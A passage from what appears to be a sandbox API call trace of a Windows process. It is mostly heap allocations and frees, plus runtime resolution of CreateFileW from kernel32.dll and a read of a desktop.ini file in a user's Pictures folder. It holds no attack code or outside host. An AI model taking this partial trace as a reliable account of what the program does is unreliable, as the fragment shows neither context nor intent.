hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0087.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0087.470] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0087.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0087.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0087.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0087.470] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0087.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0087.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0087.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0087.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0087.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0087.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0087.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0087.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0087.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0087.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0087.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.502] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0087.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.502] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0087.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0087.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0087.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0087.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0087.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0087.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.503] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0087.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.503] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.503] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0087.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0087.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0087.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca208, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0087.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0087.504] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0087.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0087.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0087.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0087.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0087.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0087.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0087.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0087.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0087.504] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0087.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2330 | out: hHeap=0x1780000) returned 1 [0087.504] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0087.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0087.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0087.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0087.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0087.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0087.505] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\pictures\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0087.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0087.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e93c8 [0087.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0087.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0087.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0087.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0087.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0087.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0087.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0087.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0087.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0087.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0087.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0087.505] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0087.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0087.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0087.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0087.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0087.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0087.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0087.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0087.506] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0087.506] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0087.506] FreeLibrary (hLibModule=0x772d0000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0087.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.508] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea0b8 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.508] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.508] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bc0 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0087.508] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ef0 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e18 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0087.509] HeapFree (in: hHeap=0x1780000, 